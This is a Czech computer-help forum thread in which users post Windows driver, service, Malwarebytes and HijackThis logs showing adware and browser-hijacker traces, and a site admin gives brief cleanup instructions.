R0 aswbidsh;aswbidsh; C:\WINDOWS\system32\drivers\aswbidsha.sys [2017-04-26 189768]
R0 aswblog;aswblog; C:\WINDOWS\system32\drivers\aswbloga.sys [2017-04-26 334088]
R0 aswbuniv;aswbuniv; C:\WINDOWS\system32\drivers\aswbuniva.sys [2017-04-26 48528]
R0 aswRvrt;aswRvrt; C:\WINDOWS\system32\drivers\aswRvrt.sys [2017-04-26 75704]
R0 aswVmm;aswVmm; C:\WINDOWS\system32\drivers\aswVmm.sys [2017-04-26 339696]
R0 BTATH_BUS;@oem16.inf,%BTATH_BUS.SVCDESC%;Qualcomm Atheros Bluetooth Bus; C:\WINDOWS\System32\drivers\btath_bus.sys [2014-02-26 35016]
R1 aswbidsdriver;aswbidsdriver; C:\WINDOWS\system32\drivers\aswbidsdrivera.sys [2017-04-26 307736]
R1 aswKbd;aswKbd; C:\WINDOWS\system32\drivers\aswKbd.sys [2017-04-26 32600]
R1 aswRdr;aswRdr; C:\WINDOWS\system32\drivers\aswRdr2.sys [2017-04-26 101152]
R1 aswSnx;aswSnx; C:\WINDOWS\system32\drivers\aswSnx.sys [2017-04-26 1005048]
R1 aswSP;aswSP; C:\WINDOWS\system32\drivers\aswSP.sys [2017-04-28 556784]
R1 vwififlt;@%SystemRoot%\System32\drivers\vwififlt.sys,-259; C:\WINDOWS\system32\DRIVERS\vwififlt.sys [2016-08-13 71680]
R2 aswMonFlt;aswMonFlt; C:\WINDOWS\system32\drivers\aswMonFlt.sys [2017-04-28 128648]
R2 aswStm;aswStm; C:\WINDOWS\system32\drivers\aswStm.sys [2017-04-26 164064]
R2 SSPORT;SSPORT; \??\C:\WINDOWS\system32\Drivers\SSPORT.sys [2009-07-11 11576]
R3 athr;@oem15.inf,%ATHR.Service.DispName%;Qualcomm Atheros Extensible Wireless LAN device driver; C:\WINDOWS\system32\DRIVERS\athwbx.sys [2014-02-14 3888640]
R3 BtFilter;BtFilter; C:\WINDOWS\system32\DRIVERS\btfilter.sys [2014-02-26 598216]
R3 BTHUSB;@bth.inf,%BTHUSB.SvcDesc%;Ovladač rozhraní USB radiostanice Bluetooth; C:\WINDOWS\System32\Drivers\BTHUSB.sys [2014-10-29 81920]
R3 iaioi2c;@oem2.inf,%Driver_Service.Desc%;I2C Controller Service; C:\WINDOWS\System32\drivers\iaioi2ce.sys [2013-11-11 67584]
R3 igfx;igfx; C:\WINDOWS\system32\DRIVERS\igdkmd64.sys [2014-03-07 3729920]
R3 IntcAzAudAddService;Service for Realtek HD Audio (WDM); C:\WINDOWS\system32\drivers\RTKVHD64.sys [2014-03-25 3903320]
R3 IntcDAud;@oem7.inf,%IntcDAud.SvcDesc%;Intel(R) Display Audio; C:\WINDOWS\system32\DRIVERS\IntcDAud.sys [2014-03-07 450520]
R3 iwdbus;@oem10.inf,%iwdbus.SVCDESC%;IWD Bus Enumerator; C:\WINDOWS\System32\drivers\iwdbus.sys [2014-03-01 27032]
R3 RTL8168;@oem11.inf,%rtl8168.Service.DispName%;Realtek 8168 NT Driver; C:\WINDOWS\system32\DRIVERS\Rt630x64.sys [2013-12-18 839896]
R3 RTSPER;@oem14.inf,%Rts5227PER%;Realtek PCIE Card Reader - PER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [2013-12-20 461528]
R3 SynRMIHID;@oem13.inf,%SynRMIHID.SVCDESC%;Synaptics HID Service; C:\WINDOWS\system32\DRIVERS\SynRMIHID.sys [2014-02-19 42224]
R3 TXEIx64;@oem12.inf,%TEE_SvcDesc%;Intel(R) Trusted Execution Engine Interface ; C:\WINDOWS\System32\drivers\TXEIx64.sys [2014-01-15 88592]
R3 usbvideo;@usbvideo.inf,%USBVideo.SvcDesc%;USB Video Device (WDM); C:\WINDOWS\System32\Drivers\usbvideo.sys [2014-06-21 212736]
R3 vwifimp;@%SystemRoot%\System32\drivers\vwifimp.sys,-261; C:\WINDOWS\system32\DRIVERS\vwifimp.sys [2016-08-13 38912]
S3 aswHwid;aswHwid; C:\WINDOWS\system32\drivers\aswHwid.sys [2017-04-26 38296]
S3 AthBTPort;@oem19.inf,%BTHSUPPORT.SvcDesc%;Qualcomm Atheros Virtual Bluetooth Class; C:\WINDOWS\system32\DRIVERS\btath_flt.sys [2014-02-26 89800]
S3 BTATH_A2DP;@oem18.inf,%BTATH_A2DP.SvcDesc%;Bluetooth A2DP Audio Driver; C:\WINDOWS\system32\drivers\btath_a2dp.sys [2014-02-26 355528]
S3 btath_avdt;@oem18.inf,%btath_avdt.SvcDesc%;Qualcomm Atheros Bluetooth AVDT Service; C:\WINDOWS\system32\drivers\btath_avdt.sys [2014-02-26 118984]
S3 BTATH_HCRP;@oem21.inf,%BTATH_HCRP.SvcDesc%;Bluetooth HCRP Server driver; C:\WINDOWS\System32\drivers\btath_hcrp.sys [2014-02-26 179432]
S3 BTATH_LWFLT;@oem23.inf,%BTATH_LWFLT%;Bluetooth LWFLT Device; C:\WINDOWS\system32\DRIVERS\btath_lwflt.sys [2014-02-26 77464]
S3 BTATH_RCP;@oem25.inf,%BTATH_RCP%;Bluetooth AVRCP Device; C:\WINDOWS\System32\drivers\btath_rcp.sys [2014-02-26 137928]
S3 BthEnum;@bth.inf,%BthEnum.SVCDESC%;Bluetooth Enumerator Service; C:\WINDOWS\System32\drivers\BthEnum.sys [2014-10-29 53248]
S3 BthLEEnum;@bthleenum.inf,%BthLEEnum.SVCDESC%;Bluetooth Low Energy Driver; C:\WINDOWS\system32\DRIVERS\BthLEEnum.sys [2014-03-18 226304]
S3 BthPan;@bthpan.inf,%BthPan.DisplayName%;Bluetooth Device (Personal Area Network); C:\WINDOWS\System32\drivers\bthpan.sys [2017-07-06 119296]
S3 BTHPORT;@bth.inf,%BTHPORT.SvcDesc%;Ovladač portu Bluetooth; C:\WINDOWS\System32\Drivers\BTHport.sys [2015-05-11 1201664]
S3 dot4;@oem42.inf,%Dot4_Name%;MS IEEE-1284.4 Driver; C:\WINDOWS\system32\DRIVERS\Dot4.sys [2012-10-19 151968]
S3 Dot4Print;@oem43.inf,%Dot4Print_Name%;Print Class Driver for IEEE-1284.4; C:\WINDOWS\System32\drivers\Dot4Prt.sys [2012-10-19 27040]
S3 dot4usb;@oem42.inf,%DOT4USB_NAME%;Dot4USB Filter; C:\WINDOWS\system32\DRIVERS\dot4usb.sys [2012-10-19 49056]
S3 GPIO;@oem1.inf,%GPIO.SVCDESC%;Intel SoC GPIO Controller Driver; C:\WINDOWS\System32\drivers\iaiogpioe.sys [2013-11-11 31232]
S3 intaud_WaveExtensible;@oem9.inf,%INTAUD_WEX.SvcDesc%;Intel WiDi Audio Device; C:\WINDOWS\system32\drivers\intelaud.sys [2014-03-01 38296]
S3 LMDriver;@oem20.inf,%LMDriver.SVCDESC%;Launch Manager Wireless Driver; C:\WINDOWS\System32\drivers\LMDriver.sys [2013-07-17 21360]
S3 massfilter;@oem34.inf,%filter.SvcDesc%;MBB Mass Storage Filter Driver; C:\WINDOWS\System32\drivers\massfilter.sys []
S3 RadioShim;@oem20.inf,%RadioShim.SVCDESC%;Shim for HID-KMDF Interface layer; C:\WINDOWS\System32\drivers\RadioShim.sys [2013-07-17 14680]
S3 RFCOMM;@tdibth.inf,%RFCOMM.DisplayName%;Bluetooth Device (RFCOMM Protocol TDI); C:\WINDOWS\System32\drivers\rfcomm.sys [2015-01-30 167424]
S3 usbscan;@sti.inf,%usbscan.SvcDesc%;Ovladač skeneru USB; C:\WINDOWS\System32\drivers\usbscan.sys [2014-10-29 44544]
S4 VBoxAswDrv;VBoxAsw Support Driver; \??\C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxAswDrv.sys []

====== List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled) ======

R2 602XML Updater;602Updater; C:\Program Files (x86)\Common Files\soft602\602updsvc\602updsvc.exe [2011-10-10 85344]
R2 AdobeARMservice;Adobe Acrobat Update Service; c:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2017-04-25 83056]
R2 AtherosSvc;AtherosSvc; C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\adminservice.exe [2014-02-26 319104]
R2 avast! Antivirus;Avast Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2017-04-26 261712]
R2 DiagTrack;@%SystemRoot%\system32\UtcResources.dll,-3001; %SystemRoot%\System32\svchost.exe -k utcsvc;"ServiceDll" = %SystemRoot%\system32\diagtrack.dll
R2 GamesAppIntegrationService;GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [2016-03-04 350064]
R2 HPSupportSolutionsFrameworkService;HP Support Solutions Framework Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [2017-07-06 321896]
R2 igfxCUIService1.0.0.0;Intel(R) HD Graphics Control Panel Service; C:\WINDOWS\system32\igfxCUIService.exe [2014-03-18 282096]
R2 IJPLMSVC;Canon Inkjet Printer/Scanner/Fax Extended Survey Program; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [2013-06-28 84616]
R2 Intel(R) Capability Licensing Service Interface;Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [2013-07-02 733696]
R2 ssinstall;SInstalátor; C:\WINDOWS\SysWOW64\ssins.exe [2017-07-06 4696960]
R2 TeamViewer;TeamViewer 11; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [2017-04-06 7757040]
R3 aswbIDSAgent;aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [2017-04-26 7398336]
R3 FontCache3.0.0.0;@%SystemRoot%\system32\PresentationHost.exe,-3309; C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe [2014-03-18 43696]
R3 QASvc;Quick Access Service; C:\Program Files\Acer\Acer Quick Access\QASvc.exe [2014-04-28 457960]
R3 RMSvc;Quick Access RadioMgr Service; C:\Program Files\Acer\Acer Quick Access\RMSvc.exe [2014-04-28 449768]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service; C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-07-12 272384]
S3 BthHFSrv;@%SystemRoot%\System32\BthHFSrv.dll,-103; %SystemRoot%\System32\svchost.exe -k LocalServiceAndNoImpersonation;"ServiceDll" = %SystemRoot%\System32\BthHFSrv.dll
S3 cphs;Intel(R) Content Protection HECI Service; C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe [2014-03-18 279024]
S3 GamesAppService;GamesAppService; C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe [2016-03-04 210288]
S3 ICCS;Intel(R) Integrated Clock Controller Service - Intel(R) ICCS; C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe [2012-04-24 169752]
S3 Intel(R) Capability Licensing Service TCP IP Interface;Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [2013-07-02 822232]
S3 Microsoft SharePoint Workspace Audit Service;Microsoft SharePoint Workspace Audit Service; C:\Program Files\Microsoft Office\Office14\GROOVE.EXE [2013-12-19 50942144]
S3 ose64;Office 64 Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2010-01-09 174440]
S3 osppsvc;Office Software Protection Platform; C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE [2010-01-09 4925184]
S3 UEIPSvc;User Experience Improvement Program; C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe [2014-01-25 222952]
S4 AvastVBoxSvc;AvastVBox COM Service; C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe []

-----------------EOF-----------------

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118275
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: Prosím o kontrolu logu

#8 Příspěvek od Rudy »

Spusťte ještě kompletní sken MBAM: http://www.malwarebytes.org/mbam.php a dejte log. Předem nic nemažte. Některé položky nebyly smazány.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

rivano
Návštěvník
Návštěvník
Příspěvky: 93
Registrován: 18 dub 2009 08:33

Re: Prosím o kontrolu logu

#9 Příspěvek od rivano »

Malwarebytes
www.malwarebytes.com

-Podrobnosti logovacího souboru-
Datum skenování: 18.07.17
Čas skenování: 20:44
Logovací soubor: log.txt
Správce: Ano

-Informace o softwaru-
Verze: 3.1.2.1733
Verze komponentů: 1.0.160
Aktualizovat verzi balíku komponent: 1.0.2393
Licence: Zkušební

-Systémová informace-
OS: Windows 8.1
CPU: x64
Systém souborů: NTFS
Uživatel: Eva\Eva Bla\u00c5\u00bekov\u00c3\u00a1

-Shrnutí skenování-
Typ skenování: Skenování hrozeb (Threat Scan)
Výsledek: Dokončeno
Skenované objekty: 381853
Zjištěné hrozby: 12
Hrozby umístěné do karantény: 0
(Nebyly zjištěny žádné škodlivé položky)
Uplynulý čas: 6 min, 27 sek

-Možnosti skenování-
Paměť: Povoleno
Start: Povoleno
Systém souborů: Povoleno
Archivy: Povoleno
Rootkity: Zakázáno
Heuristika: Povoleno
Potenciálně nežádoucí program: Povoleno
Potenciálně nežádoucí modifikace: Povoleno

-Podrobnosti skenování-
Proces: 0
(Nebyly zjištěny žádné škodlivé položky)

Modul: 0
(Nebyly zjištěny žádné škodlivé položky)

Klíč registru: 3
PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\INSTALLEDSDB\{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}, Žádná uživatelská akce, [2308], [253643],1.0.2393
PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\INSTALLEDSDB\{cf2797aa-b7ec-e311-8ed9-005056c00008}, Žádná uživatelská akce, [2308], [253644],1.0.2393
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\VC32Ldr, Žádná uživatelská akce, [5579], [244209],1.0.2393

Hodnota v registru: 9
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\chrome.exe|{8A4D5A43-C64A-45AB-BDF4-804FE18CEAFD}.SDB, Žádná uživatelská akce, [5579], [244208],1.0.2393
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\explorer.xxx|{8A4D5A43-C64A-45AB-BDF4-804FE18CEAFD}.SDB, Žádná uživatelská akce, [5579], [244208],1.0.2393
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\firefox.exe|{8A4D5A43-C64A-45AB-BDF4-804FE18CEAFD}.SDB, Žádná uživatelská akce, [5579], [244208],1.0.2393
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\iexplore.exe|{8A4D5A43-C64A-45AB-BDF4-804FE18CEAFD}.SDB, Žádná uživatelská akce, [5579], [244208],1.0.2393
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\software_removal_tool.exe|{8A4D5A43-C64A-45AB-BDF4-804FE18CEAFD}.SDB, Žádná uživatelská akce, [5579], [244208],1.0.2393
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\software_reporter_tool.exe|{8A4D5A43-C64A-45AB-BDF4-804FE18CEAFD}.SDB, Žádná uživatelská akce, [5579], [244208],1.0.2393
PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS|APPINIT_DLLS, Žádná uživatelská akce, [2308], [-1],0.0.0
PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS|APPINIT_DLLS, Žádná uživatelská akce, [2308], [-1],0.0.0
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\VC32Ldr|{8A4D5A43-C64A-45AB-BDF4-804FE18CEAFD}.SDB, Žádná uživatelská akce, [5579], [244209],1.0.2393

Data registrů: 0
(Nebyly zjištěny žádné škodlivé položky)

Datové proudy: 0
(Nebyly zjištěny žádné škodlivé položky)

Adresář: 0
(Nebyly zjištěny žádné škodlivé položky)

Soubor: 0
(Nebyly zjištěny žádné škodlivé položky)

Fyzický sektor: 0
(Nebyly zjištěny žádné škodlivé položky)


(end)

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118275
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: Prosím o kontrolu logu

#10 Příspěvek od Rudy »

Smažte všechny nalezené položky.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

rivano
Návštěvník
Návštěvník
Příspěvky: 93
Registrován: 18 dub 2009 08:33

Re: Prosím o kontrolu logu

#11 Příspěvek od rivano »

Smazáno. Ještě nějaký postup bude?

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118275
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: Prosím o kontrolu logu

#12 Příspěvek od Rudy »

Pokud je všechno v pořádku, je to vše.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

Nerzy23
Návštěvník
Návštěvník
Příspěvky: 2
Registrován: 22 črc 2017 18:51

Re: Prosím o kontrolu logu

#13 Příspěvek od Nerzy23 »

prosím o kontrolu logu PC se seká, google chrome začal rozesílat na FB viry.

Logfile of random's system information tool 1.16 (written by random/random)
Run by GIGABYTE at 2017-07-22 19:33:04
Microsoft Windows 8.1 Pro
System drive C: has 11 GB (12%) free of 90 GB
Total RAM: 8006 MB (59% free)
X64

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 19:33:10, on 22. 7. 2017
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.9600.18123)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
C:\Program Files\AVAST Software\Avast\AvastUI.exe
C:\Users\GIGABYTE\AppData\Roaming\Seznam.cz\bin\szndesktop.exe
C:\Users\GIGABYTE\AppData\Roaming\uTorrent\utorrent.exe
C:\Users\GIGABYTE\AppData\Local\MyComGames\MyComGames.exe
C:\Users\GIGABYTE\AppData\Local\Gaijin\Program Files (x86)\NetAgent\gjagent.exe
C:\Users\GIGABYTE\AppData\Local\background_fault\aswRD.exe
C:\Windows\SysWOW64\ctfmon.exe
C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe
C:\ProgramData\MEGAsync\MEGAsync.exe
C:\Program Files (x86)\Firefox\Firefox.exe
C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
C:\Program Files\trend micro\GIGABYTE_RSITx64.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.ourluckysites.com/?type=hp&t ... ALZ11ALZ11
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.attirerpage.com/search/?type ... earchTerms}
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = https://www.seznam.cz/?clid=22668
R1 - HKCU\Software\Microsoft\Inaet Explorer\Main,Search Page = http://www.attirerpage.com/search/?type ... earchTerms}
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.seznam.cz/?clid=28314
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.ourluckysites.com/?type=hp&t ... ALZ11ALZ11
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.attirerpage.com/search/?type ... earchTerms}
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = https://www.seznam.cz/?clid=22668
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.attirerpage.com/search/?type ... earchTerms}
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.ourluckysites.com/?type=hp&t ... ALZ11ALZ11
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: (no name) - {1046a206-5101-4a81-8358-1dbb63ae3210} - C:\Program Files (x86)\PConverter_dz\bar\1.bin\dzSrcAs.dll
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: True Key Helper - {0F4B8786-5502-4803-8EBC-F652A1153BB6} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll
O2 - BHO: ExplorerBHO Class - {449D0D6E-2412-4E61-B68F-1CB625CD9E52} - C:\Program Files\Classic Shell\ClassicExplorer32.dll
O2 - BHO: (no name) - {656e2a25-8226-470b-9a67-b2a60f657630} - (no file)
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_131\bin\ssv.dll
O2 - BHO: ArcPluginIEBHO - {84BFE29A-8139-402a-B2A4-C23AE9E1A75F} - D:\plugins\ArcPluginIE.dll (file missing)
O2 - BHO: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~1\Office14\URLREDIR.DLL
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_131\bin\jp2ssv.dll
O3 - Toolbar: Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer32.dll
O3 - Toolbar: True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll
O4 - HKLM\..\Run: [seznam-listicka-distribuce] "C:\Program Files (x86)\Seznam.cz\distribution\szninstall.exe" -s -d listicka 1 szn-software-listicka cz.seznam.software.autoupdate
O4 - HKLM\..\Run: [VirtualCloneDrive] "C:\Program Files (x86)\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe" /s
O4 - HKLM\..\Run: [Arc] D:\ArcLauncher.exe /autorun
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKCU\..\Run: [Steam] "D:\Steam\steam.exe" -silent
O4 - HKCU\..\Run: [cz.seznam.software.autoupdate] "C:\Users\GIGABYTE\AppData\Roaming\Seznam.cz\szninstall.exe" -c
O4 - HKCU\..\Run: [cz.seznam.software.szndesktop] "C:\Users\GIGABYTE\AppData\Roaming\Seznam.cz\bin\wszndesktop.exe" -q
O4 - HKCU\..\Run: [MyAdBlocker] C:\Program Files (x86)\My Ad Blocker\AdBlocker.exe
O4 - HKCU\..\Run: [uTorrent] "C:\Users\GIGABYTE\AppData\Roaming\uTorrent\utorrent.exe"
O4 - HKCU\..\Run: [MyComGames] "C:\Users\GIGABYTE\AppData\Local\MyComGames\MyComGames.exe" -autostart
O4 - HKCU\..\Run: [Gaijin.Net Agent] "C:\Users\GIGABYTE\AppData\Local\Gaijin\Program Files (x86)\NetAgent\gjagent.exe"
O4 - HKCU\..\Run: [World of Tanks] "C:\Games\World_of_Tanks\WargamingGameUpdater.exe"
O4 - HKCU\..\Run: [background_fault] "C:\Users\GIGABYTE\AppData\Local\background_fault\aswRD.exe" "C:\Users\GIGABYTE\AppData\Local\background_fault\bf.dll",background_fault_collector
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
O4 - HKCU\..\Run: [World of Tanks (1)] "D:\Games\WargamingGameUpdater.exe"
O4 - HKUS\S-1-5-18\..\Run: [] (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [] (User 'Default user')
O4 - Startup: MEGAsync.lnk = C:\ProgramData\MEGAsync\MEGAsync.exe
O4 - Global Startup: TP-LINK Wireless Configuration Utility.lnk = C:\Program Files (x86)\TP-LINK\TP-LINK Wireless Configuration Utility\TWCU.exe
O8 - Extra context menu item: &Block This Image (ABP) - C:\Adblock Pro\blockimg.html
O8 - Extra context menu item: E&xportovat do aplikace Microsoft Excel - res://C:\PROGRA~1\MICROS~1\Office14\EXCEL.EXE/3000
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O17 - HKLM\System\CCS\Services\Tcpip\..\{35094376-0485-4D01-B8B7-7A2912401C90}: NameServer = 8.8.8.8,8.8.4.4,4.2.2.1,4.2.2.2,208.67.222.222,208.67.220.220,8.26.56.26,8.20.247.20,156.154.70.1,156.154.71.1
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: AMD - Unknown owner - C:\Users\GIGABYTE\AppData\Local\AMD\amd.exe
O23 - Service: Arc Service (ArcService) - Unknown owner - D:\ArcService.exe (file missing)
O23 - Service: aswbIDSAgent - AVAST Software s.r.o. - C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
O23 - Service: Avast Antivirus (avast! Antivirus) - AVAST Software - C:\Program Files\AVAST Software\Avast\AvastSvc.exe
O23 - Service: BattlEye Service (BEService) - Unknown owner - C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
O23 - Service: BitRaider Mini-Support Service Stub Loader (BRSptStub) - BitRaider, LLC - C:\ProgramData\BitRaider\BRSptStub.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\Windows\SysWow64\IntelCpHeciSvc.exe
O23 - Service: DeskTop DispalyName (DeskTop_F) - DeskTopService - C:\ProgramData\desktopfind\desktop244.exe
O23 - Service: EasyAntiCheat - EasyAntiCheat Ltd - C:\Windows\system32\EasyAntiCheat.exe
O23 - Service: ed2k idle service (ed2kidle) - http://www.amule.org/ - C:\Program Files (x86)\amuleC\ed2k.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: Update Service(FirefoxU) (FirefoxU) - Unknown owner - C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
